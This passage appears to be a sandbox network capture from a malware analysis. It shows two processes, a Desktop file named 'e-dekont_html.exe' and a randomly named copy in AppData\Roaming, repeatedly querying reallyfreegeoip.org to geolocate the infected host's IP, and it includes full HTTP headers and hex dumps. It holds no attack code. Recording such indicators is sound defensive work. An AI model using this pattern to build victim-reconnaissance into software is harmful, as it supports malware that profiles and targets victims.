    server-timing: cfL4;desc="?proto=TCP&rtt=1775&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1548250&cwnd=203&unsent_bytes=0&cid=2f100f4569019160&ts=121&x=0"
                                                                                                                                                        2024-11-20 06:52:15 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49742 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7308 | Process: C:\Users\user\Desktop\e-dekont_html.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:52:17 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-11-20 06:52:17 UTC | 856 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:17 GMT
    Content-Type: text/xml
    Content-Length: 361
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 49446
    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oA2vZrrjyQnAdqq6WO%2BQA5BZvBZqDkecCDi3iiXOJKwhdUjay%2BuzIud02h7w7eeYHDRTzhqz9SjGbMC2nUw%2FnAQrhsglJ5AjoPVpd%2BabD%2FAbh6XT3ANs%2FyvJ7h1ikwqoymXBiVua"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e56842f98221a24-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1909&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1502830&cwnd=209&unsent_bytes=0&cid=5fb64c546cd9c4af&ts=157&x=0"
2024-11-20 06:52:17 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49744 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7696 | Process: C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:52:19 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-11-20 06:52:19 UTC | 848 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:19 GMT
    Content-Type: text/xml
    Content-Length: 361
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 49448
    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qvSPhPLoRIAT29qlHK42rqtAcphEF9qOjHDsLmdYK30Yamjiia%2FunpA4g1KcrxNjror4%2FOqfrxOYSDA8pvlmf31F1a1lyQgimzH6LhpdB7O6F3FftjDZa2KqObLZ63ompH8EJDGK"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e56843c3e664379-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1618&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1719670&cwnd=194&unsent_bytes=0&cid=57c30b33908eb9d4&ts=610&x=0"
2024-11-20 06:52:19 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49745 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7308 | Process: C:\Users\user\Desktop\e-dekont_html.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:52:19 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
    Host: reallyfreegeoip.org
2024-11-20 06:52:19 UTC | 852 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:19 GMT
    Content-Type: text/xml
    Content-Length: 361
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 49448
    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2B2ApLr7uud4T9OGW8eP714NTRAPT4mOZ66rCmO7tsN382zDfyiQ4bO8vS9RHP8El7ySHaYH4AoPKnfJPwlgfhPi3PFQ%2B30gwMbX4Xl05u%2B4%2B71zwyyFBGytpcMJ3gzZEZ2IDF8P"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e56843d9c36c33b-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1469&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1976980&cwnd=182&unsent_bytes=0&cid=085313ffa0f9954e&ts=118&x=0"
2024-11-20 06:52:19 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49746 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7696 | Process: C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:52:19 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
    Host: reallyfreegeoip.org
2024-11-20 06:52:20 UTC | 856 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:20 GMT
    Content-Type: text/xml
    Content-Length: 361
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 49449
    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hns5voylGasOli75ZX5yS%2FScxLMxhhwJ55e9SR2o2%2FZ3qLFcqj2j%2F%2FtgvudZ2k%2BRTvstgNJndL8h2xEbDSkJuKyUpnczDglezHEJ1YMaHK8N5hjJzl4bRBd7oh%2Ft4Fayw7dFXahw"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e568441185e43b3-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2037&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1405197&cwnd=185&unsent_bytes=0&cid=52a82181443c5d58&ts=160&x=0"
2024-11-20 06:52:20 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49748 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 7308 | Process: C:\Users\user\Desktop\e-dekont_html.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:52:20 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-11-20 06:52:20 UTC | 850 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 06:52:20 GMT
    Content-Type: text/xml
    Content-Length: 361
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 49449
    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lnMjZNSt%2Ba6642VMqyW7qbDBr7PnJVpHMhbi40wfBPaihzIEh1oXC1eHELbk%2BcxjaMDCFA9UyTja1hddZCkwpccudaI45rTYaxnklIupx4Xfwf0wQ%2FST1FE0myBC09x4L8HlBsLs"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e5684448de28c05-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2036&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1409946&cwnd=211&unsent_bytes=0&cid=c74a4f1801bd1ad0&ts=139&x=0"
2024-11-20 06:52:20 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49750 | 188.114.96.34 | 443 | 7696 | C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:52:21 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-20 06:52:21 UTC | 849 | IN | HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 06:52:21 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 49450
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MvpxVCfQlsQBXs3X4qVWOjGmXyjDwM3bIt56g3%2F5VJ40Q%2Fpyn0vgC5Zn6JFiCEmLZwpF2r0FBzIFIkaqwqrj7U3XL2jMCfCQCxFy2Sk9JkKd51saXYQ5CfWeaEdONZk2hyIOLXmu"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e5684489affc343-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=10058&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1724748&cwnd=208&unsent_bytes=0&cid=41dbd44e6110845d&ts=194&x=0"
2024-11-20 06:52:21 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49752 | 188.114.96.34 | 443 | 7308 | C:\Users\user\Desktop\e-dekont_html.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:52:21 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-20 06:52:21 UTC | 852 | IN | HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 06:52:21 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 49450
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XJgt44fn9YXpQTFeCKYFr7iHFzkyBot1O%2Bygua57%2BNXjrXHRjGCBGheiZ8%2FObzGPokxg0NBCXaQi%2BJsBqq5s8HcFY0hIsdtN1d4sb8tP3Qkf5NCXk6RNMiE84Hc31ffu9qht4xom"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e56844c5ada5e66-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1855146&cwnd=174&unsent_bytes=0&cid=7db87799810e647f&ts=159&x=0"
2024-11-20 06:52:21 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49759 | 188.114.96.34 | 443 | 7696 | C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:52:23 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-20 06:52:23 UTC | 860 | IN | HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 06:52:23 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 49452
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ih4bTY75ujwQ%2Fp%2Fc2HsPfEU2oAVyUVuO40H2OiyjEuEQNYLLMc0ffDjbPZox%2Bp1aP5zywAz%2B4yZHrgpro4fj3xk7%2FBIubRLmmv%2BKS8OWJPRXBgvEj6f6QdZaQnn%2FADdNbnMbC%2FpN"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e568458392fc335-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1669&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1664766&cwnd=163&unsent_bytes=0&cid=8f2e053503bfdef4&ts=147&x=0"
2024-11-20 06:52:23 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49760 | 188.114.96.34 | 443 | 7308 | C:\Users\user\Desktop\e-dekont_html.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:52:23 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-20 06:52:24 UTC | 860 | IN | HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 06:52:23 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 49452
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FW3l7X0%2B0Y2ed3wKKFDfSeCoIjfn9sgyVoQ%2BKRNO29ddCJvubH0bu4Z3Xv4Ba8ulWpodiEB7mp70Qg4ulr7%2Fo%2BQZ8wlbfb8X9KyrfIWDrHluYq%2BmwLWL%2Fq0cXVmYifed%2FflvU228"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e568459cfbe726e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1837&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1597374&cwnd=217&unsent_bytes=0&cid=87292c60bf089f32&ts=160&x=0"
2024-11-20 06:52:24 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49765 | 188.114.96.34 | 443 | 7696 | C:\Users\user\AppData\Roaming\fahKSvwo.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-20 06:52:26 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
